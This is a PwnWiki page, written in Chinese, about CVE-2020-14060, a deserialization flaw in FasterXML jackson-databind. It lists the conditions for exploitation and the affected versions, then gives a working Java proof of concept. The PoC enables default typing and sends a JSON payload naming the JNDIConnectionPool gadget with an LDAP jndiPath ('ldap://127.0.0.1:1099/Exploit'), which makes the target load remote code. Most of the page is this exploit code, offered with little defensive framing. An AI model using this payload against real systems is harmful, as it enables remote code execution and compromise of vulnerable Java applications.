CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞

From PwnWiki
Revision as of 09:03, 17 June 2021 by Pwnwiki (talk | contribs) (Created page with "<languages /> <translate> ==利用條件== </translate> <translate> 開啟enableDefaultTyping() 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 </translate> <tr...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

利用條件

開啟enableDefaultTyping()

使用了org.apache.drill.exec:drill-jdbc-all第三方依賴

影響版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
   public static void main(String[] args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
       mapper.enableDefaultTyping();
       String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
       try {
           Object obj = mapper.readValue(payload, Object.class);
           mapper.writeValueAsString(obj);
       } catch (IOException e) {
           e.printStackTrace();
       }
   }
}
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-14060_FasterXML_jackson-databind_反序列化漏洞&oldid=5231"